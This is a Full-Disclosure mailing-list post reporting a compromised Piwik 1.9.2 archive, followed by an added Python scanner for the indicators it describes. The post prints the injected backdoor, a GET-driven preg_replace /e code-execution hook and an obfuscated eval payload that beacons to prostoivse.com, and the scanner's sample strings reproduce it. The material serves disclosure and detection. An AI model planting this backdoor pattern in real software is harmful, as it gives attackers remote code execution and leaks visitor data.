Message-ID: <50B3CE75.9060107@grobecker-wtal.de>
Date: Mon, 26 Nov 2012 21:17:57 +0100
From: Maximilian Grobecker <max@...becker-wtal.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Possible infection of Piwik 1.9.2 download archive

Hi,

this evening I downloaded a fresh archive of Piwik 1.9.2 and found this code at the bottom of the /piwik/core/Loader.php file:
(Just a short snippet)

-----------snip-------------
<?php
Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');
    exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s [.......]
-----------/snip-------------

I decoded some parts of this code and found what it does:
It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and the request URI via POST to http://prostoivse.com/x.php and creates a file named "lic.log" in the same directory.
As long as this file exists it seems that no further POST requests are made.

At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET).

The file in the downloadable archive is dated Nov 26, 2012 / 18:42 UTC.
From forums I know that some people downloaded the archive earlier this day and don't have this code inside their files.
At the moment (at 8:08 PM UTC) the archive is downloadable at the original Piwik web site with this obfuscated code.

I contacted the developers and managers of Piwik a few minutes ago about this.

--
Greetings from Wuppertal, Germany
Max Grobecker

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
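An added example, not part of the post or of Piwik: a small scanner that checks a Piwik install for the indicators Max describes (the preg_replace /e call, the eval(gzuncompress(base64_decode())) wrapper, the lic.log marker, the beacon domain) and statically unwraps the compressed payload so the domain can be matched without executing anything. The sample inputs at the bottom are constructed, and the payload body inside them is made up.

```python
import base64
import re
import zlib
from pathlib import Path

# Indicators taken from the snippet in the post; the domain and marker file name are the
# ones the post reports after decoding the payload (added scanner, not Piwik code).
INDICATORS = {
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "preg_replace_e_modifier": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/\w*e\w*['\"]"),
    "eval_gzuncompress_base64": re.compile(r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\("),
    "lic_log_marker": re.compile(r"lic\.log"),
    "c2_domain": re.compile(r"prostoivse\.com"),
}
PAYLOAD_RX = re.compile(r"gzuncompress\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
def scan_source(src: str) -> list:
    """Names of all indicators present in one PHP source text."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]
def decode_payload(src: str):
    """Statically unwrap eval(gzuncompress(base64_decode('...'))) without running it; PHP's
    gzuncompress is zlib format. Returns None if absent or the blob is truncated/corrupt."""
    m = PAYLOAD_RX.search(src)
    if not m:
        return None
    try:
        return zlib.decompress(base64.b64decode(m.group(1))).decode("latin-1")
    except (ValueError, zlib.error):
        return None
def scan_file(path: Path) -> list:
    """Indicators in the file itself plus those only visible inside the decoded payload."""
    src = path.read_text(errors="replace")
    hits = scan_source(src)
    decoded = decode_payload(src)
    if decoded:
        hits += ["payload:" + h for h in scan_source(decoded)]
    return hits
def scan_tree(root: str) -> dict:
    """Walk a Piwik install; report PHP files with indicators and any lic.log marker files."""
    base = Path(root)
    findings = {str(p.relative_to(base)): scan_file(p) for p in base.rglob("*.php")}
    findings.update({str(p.relative_to(base)): ["lic_log_file_present"] for p in base.rglob("lic.log")})
    return {name: hits for name, hits in findings.items() if hits}

# Constructed samples mimicking the posted snippet; the compressed payload body is made up.
_FAKE_PAYLOAD = base64.b64encode(zlib.compress(b"<?php $u='http://prostoivse.com/x.php'; touch('lic.log');")).decode()
SAMPLE_BACKDOORED = ("<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) "
                     "{ preg_replace(\"/(.+)/e\", $_GET['g'], 'dwm'); exit; } if (file_exists(dirname(__FILE__).\"/lic.log\")) exit; "
                     f"eval(gzuncompress(base64_decode('{_FAKE_PAYLOAD}')));")
SAMPLE_CLEAN = "<?php class Piwik_Loader { public static function autoload($c) { require_once $c . '.php'; } }"
```

Run `scan_tree("/path/to/piwik")` against an unpacked archive; a hit on `core/Loader.php` or a `core/lic.log` file matches what the post describes.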